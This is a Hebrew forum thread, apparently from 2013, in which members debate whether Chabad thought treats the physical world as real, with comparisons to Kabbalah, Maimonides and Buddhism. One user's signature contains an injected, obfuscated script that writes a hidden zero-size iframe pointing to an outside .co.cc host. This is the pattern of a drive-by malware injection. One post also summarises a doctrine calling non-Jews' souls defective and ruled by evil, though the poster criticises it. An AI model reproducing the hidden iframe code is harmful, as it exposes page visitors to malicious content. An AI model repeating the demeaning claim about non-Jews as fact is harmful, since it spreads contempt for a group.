בית פורומים עצור כאן חושבים

מציאות העולם על פי שיטת חב"ד

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-23/3/2013 22:36 לינק ישיר 
מציאות העולם על פי שיטת חב"ד

שלום וברכה.

רציתי לשאול את חכמי הפורום: האם שיטת חב"ד על מציאות העולם גורסת שהעולם הוא איננו אונטולוגי אלא רק פרי מוחנו?

כלומר הוא אינו קיים בחוץ לנו באמת
בתודה איתי.

דווח על תוכן פוגעני

נשלח ב-23/3/2013 23:54 לינק ישיר 

איתי

קשה לי לומר שאני מומחה לחב"ד, ואני ודאי מתנגד לחלק ממה שכתב בעל ה"תניא". כפי שבארתי בכמה מקומות.

לגבי תכולת המציאות לפי גרסת חב"ד, זה כך.

יש אלוקים.

מלוא כל המציאות.

אין מקום פנוי ממנו.

לכן כל דבר זו אלוקות.

גם העולם הפיזי.

גם האדם.

כל אדם בפני עצמו.

אמנם למרות שהכל אלוקות, יש רמות ואיכויות שונות בתוך אותה אלוקות.

יש טוב. יש רע. יש תערובות.

אפשר לסדר את הכל על ציר, אם כי יותר מדוייק לומר שיש כאן מערכת של לפחות שלושה ממדים. מערכת זו ניתנת לתיאור מן הסתם לפי הדימויים הקבליים האופיינים, מן הזוהר והאר"י: דמות אדם, מערכת ספירות, קוים ועיגולים ועוד.

מהו העולם הפיזי? העולם הפיזי קיים למרות שהוא אלוקות ברמה נמוכה מאד. יש בו ניצוצות שמחיים אותו ויש שפע שיורד אליו. ומאז החטאים (אדם הראשון, חטא העגל), הספירות בצד הרע גם כן השתלטו על השפע האלוקי ומורידות אותו במקומות לא טובים ולא מתאימים (הגויים במקום היהודים).

(לפי הרמח"ל יש מנגנוני הגנה שאינם מאפשרים לספירות הרע להשתלט על הכל באופן בלתי הפיך ומזיק יותר מדי. איני יודע איך זה בחב"ד).

העולם הפיזי מלא אם כן ניצוצות שתפקיד היהודי שומר המצוות הוא להרימם. איני יודע מה זה אומר. האם הקליפה תישאר ריקה ותעלם או תתוקן ותתעלה גם כן (כך זה אצל הרמח"ל נדמה לי, ואיני זוכר איך זה בחב"ד).

עד כאן העולם הפיזי. כלומר זה שאנו חיים בו.

לגבי האדם, יש שני סוגים.

הגוי יש לו נשמה פגומה, ויש בה רע, והרע שולט. והוא משרת את כוחות הרע בגניבת השפע האלוקי למטרות רעות.

היהודי יש לו נשמה מעורבת, ויש בה טוב וגם משהו אמצעי (קליפת נוגה?). תפקידו לחזק את הצד הטוב כדי לשרת את איסוף הניצוצות.

אמנם גם בין היהודים יש דרגות.

יש אנשים פשוטים ויש אדמורים. מבין האדמורים, יש ביניהם "בינונייים" שאינם נכשלים לעולם בשום חטא, לא במעשה, ולא בדיבור, ורק מחשבותיהם אינם ברשותם. ויש כאלו שהם צדיקים, ולהם שלטון מוחלט על מחשבותיהם. ולעולם לא ייכשלו. איני יודע מי כלול ברשימה, אבל אני מניח שבעל התניא מיקם בה את האבות, את דוד המלך אולי (למרות חטא בת שבע ולמרות רגזנותו) את הבעש"ט ואת המגיד ממזריץ' מורו - ואולי את עצמו?

בכל אופן, הכל אלוקות. אם כי ברמות ובאיכויות שונות כפי שהתבאר.

לפיכך לא נכון יהיה לומר שהעולם קיים רק בתודעתנו. הנכון הוא ששום דבר אינו באמת. הכל אלוקות שמתחלקת ומתחזה למשהו אחר. לבני אדם. לעולם פיזי.

כבר היתה חוקרת שהעלתה את הרעיון להשוות מבחינה זו בין חב"ד לבודהיזם, וזה דבר שיש בו לדעתי ממש.

וכמובן, איני מומחה לחב"ד ואני מציע רק את התרשמותי.

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 00:35 לינק ישיר 
איזו אלוקות זו?

מפוררת, מפוזרת , ממש מוגדרת הייתי אומר...

מה שבטוח זה לא האלוקים של הרמב"ם...

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 00:40 לינק ישיר 
מוזר

מה זאת אומרת גם האדם הוא אלוהים?

זה שייך ליהדות התפיסה הזו?

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 00:55 לינק ישיר 

איתי

אל תשכח שאיני מומחה לחבד ואני מתרגם אותם כפי מיעוט הבנתי. יש הרבה חבדניקים, וכמה מהם ממש ידענים, שהיו כותבים כאן. איני יודע היכן הם. למרבה הצער הם חדלו להופיע כאן.

זימנתי אחרים שאני מכיר. אולי הם יואילו להפציע.

האם זו יהדות? ובכן.... מה זו יהדות? מה שראוי להיות יהדות? ומהו זה? ולפי מה יודעים?

או מה שנקרא בשם יהדות בהיסטוריה שלנו?

החבדניקים מאמינים שמה שכתב בעל התניא הוא הוא הסוד הנעלם והעמוק של הבריאה. בוודאי שרק מעטים מאד שמעו על זה לפניהם, אבל הם מאמינים, כמו כל המקובלים, שספרי החידוש שלהם הם בעצם שיחזור של חכמה עתיקה שפשוט הוסתרה מאד מאד טוב. עד שמשמים ניתנה רשות לגלות.

__טעות הקלדה..._______________

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 24/03/2013 00:56:13

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 01:32 לינק ישיר 

מיימוני.
משום מה האופן שאתה מציג את תורת חב"ד מזכיר לי קצת את האופן שבו מוצגים הבונים החופשיים אצל דן בראון. תודה לך על הרעיון.
['חכמה עתיקה' 'סוד נעלם' 'הוסתרה מאוד טוב' 'רק מעטים שמעו על זה לפינהם' וכו' וכו'].

איתי.
אכן חלק מהביקורות שספגו חב"ד הם סביב הביקורות שהעלת בהודעותיך הקודמות.

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 05:47 לינק ישיר 

<האם שיטת חב"ד על מציאות העולם גורסת שהעולם הוא איננו אונטולוגי אלא רק פרי מוחנו>

לשיטת חב"ד גם חב"ד וגם מוחך אינם קיימים אלא הם פרי מוחך.

תוקן על ידי נישטאיך ב- 24/03/2013 05:48:21

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 06:58 לינק ישיר 

וממנה יושע ?

http://pluto.huji.ac.il/~mselio/iyunim-9.pdf

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 07:59 לינק ישיר 

דה וינצ'י

אמנם טענתי שאין אני מומחה לשיטת חב"ד, אבל החלק שאליו התייחסת בהשוואה לדן בראון אינו לקוח מחב"ד עצמה, אלא מעקרון שעושים בו שימוש בהיסטוריה של הקבלה. וביקורתי עליו, שאולי לא הסברתי מספיק, מופיעה בהרחבה בספרו של משה הלברטל על הסוד כתופעה היסטורית.

וזה  תורף הדברים, שוב: המקובלים וכל בעלי הסוד טוענים שהם ממשיכים מסורת עתיקה ולא ידועה. כיון שהמסורת אינה ידועה היום לאיש, כל מי שיטען שהוא זה שיודע אותה לא ניתן להפריך את דבריו.

זה לא אומר שמי שמתיימר לדעת את הסוד הוא משקר. אבל זה אומר שלא ניתן לבדוק אותו בכלים היסטוריים.

טריק כזה יכול לשמש רמאים והוא אמצעי ספרותי נאה (על הספר של בראון לא ארצה להרחיב. הוא מכיל טעויות היסטוריות גסות, לפחות בתחום היהדות. הרוצה יפתח אודותיו אשכול). הטענה שאדם זכה לדעת את הסוד מופיעה פעמים רבות בתולדות עמנו. לא רק אצל מקובלים. גם הרמב"ם טען שהוא יודע את הסודות שחז"ל אסרו לפרסם וכמסתבר הם זהים למה שטענו הפילוסופים בני זמנו, כנראה בני האסכולה האריסטוטלית.

כדאי לזכור שאדם יכול להביע טענות שהוא מאמין בהן בלב שלם. אם יחברו אותו למכונת אמת, היא תראה שהוא מאמין במה שהוא אומר. אבל הוא טועה - ומטעה את עצמו. זה תורף ביקורתי על הקבלה. מאמיניה מאמינים בה בלב שלם, אבל הם טועים, כפי שטענתי באשכולות רבים ולא אמחזר וגם אין בכך צורך כאן.

אם כמובן לא דייקתי בהצגת תכני אמונות חב"ד, עלינו לחכות לחבדניקים או למומחים שייטיבו לעשות זאת ממני.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 10:30 לינק ישיר 

'סוד נעלם', 'חכמה קדמונית נסתרת', הם ביטויים המשמשים שיטה בדוקה להכניס רעיונות שהם, בפני עצמם, סטיה בוטה או כפירה, ולהפחית את ההתנגדות לרעיונות אלו.
חלק אחר בשיטה הוא הסתמכות על המאמין 'התמים' שלא יעז להרהר על כאלו דברים נשגבים, ויבלע אותם כמות שהם בלי לחשוב ובלי להבחין.
יש גם צד חיובי בכל העניין הזה, אפשר להכניס רעיונות חדשים מהחוץ פנימה. זה פורה מאד.
עודד

תוקן על ידי 932woland ב- 24/03/2013 10:36:50

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 12:26 לינק ישיר 

נישטאיך כתב:
<האם שיטת חב"ד על מציאות העולם גורסת שהעולם הוא איננו אונטולוגי אלא רק פרי מוחנו>

לשיטת חב"ד גם חב"ד וגם מוחך אינם קיימים אלא הם פרי מוחך. 

תוקן על ידי נישטאיך ב- 24/03/2013 05:48:21

לא הבנתי למה מימוני לא פנה אליך כמומחה לחב"ד- לענ"ד אין מומחה גדול ממך כאן..
בהמשך למה שכתבת.    

לשיטת חב"ד גם חב"ד וגם מוחך-וגם הרבי זצ"ל שליטא שהוא המשיח- אינם קיימים אלא הם פרי מוחך.

והאם השיטה של חב"ד אינו פרי מוחו של הממציא?- ואוליי מעולם לא היה קיים.

תוקן על ידי ירוחםשמ ב- 24/03/2013 13:06:52

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 14:21 לינק ישיר 
לספרן ומימוני

נסיתי לקרוא את המאמר של רחל אליאור , אך כנראה שדעתי קצרה מדי ולא הצלחתי להבין את הדברים לעומק.

האם הבנתם מכך שלדעתה חב"ד סבורים שהעולם אונטולוגי?

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 14:46 לינק ישיר 
למיימוני

שלום.

חיפשתי אשכולים דומים בפורום והגעתי לאשכול זהhttp://www.bhol.co.il/forum/topic.asp?topic_id=2919991&forum_id=1364

שם כתבת בין היתר: "כל המציאות אינה אלא דמיון, שלילת מציאות פרטית של תודעה פרטית (יש כאן פרדוקס: מי טועה ומי בוחר לטעות, אבל זה משותף לשתי הדרכים) ועוד."

אני רואה שלאחר בירור שם חלה השתנות בעמדתך כי הנ"ל תופסים את העולם כדמיון.
בנוסף למה התכונת באומר כי הם שוללים מציאותה של תודעה פרטית? לא הבנתי את הפרדוקס שעליו דיברת. אשמח להסבר הדברים.

איתי.

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 19:03 לינק ישיר 

איתי

אם כתבתי שחב"ד רואים את העולם כדמיון, מסתבר שחזרתי בי, סמיילי, או שאני משתמש במילים קצת אחרת. כמדומה שהכל תלוי איך אנו משתמשים במילים: דמיון, מציאות וכיו"ב.

יש בהחלט מקום לטענה, שהזכרתי לעיל, שלבודהיזם ולחב"ד משותפת שלילת המציאות באשר היא וראייתה כדמיון כלומר טעות של המסתכל.

גם הבודהיזם וגם חב"ד נאלצים להתמודד עם השאלה טעות זו מנלן ומי הטועה (התובנה של דקארט).

מה שכתבתי פעם על העלמת התודעה הפרטית בחב"ד שריר וקיים: בעל התניא מפרק את האדם לנשמה ולגוף, ואת הנשמה הוא מפרק לחלקי חלקים. כתוצאה מכך, לא ברור מי שם נקרא "אני". אין כזו ישות, למעשה.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 19:30 לינק ישיר 
למימוני

מה זאת אומרת אין ישות כזאת אני?

אז מי בדיוק כותב כרגע את ההודעה אם לא אני?

דדווח על תוכן פוגעני

נשלח ב-24/3/2013 20:45 לינק ישיר 

אני חושב שכדי שמיימוני יסביר צריך להשפיע עליו שחוץ מפרק א-ח בערך שלמד שימשיך בפרקים הבאים כדי שיבין לאשורו

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > מציאות העולם על פי שיטת חב"ד
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 4 5 6 לדף הבא סך הכל 6 דפים.

bholext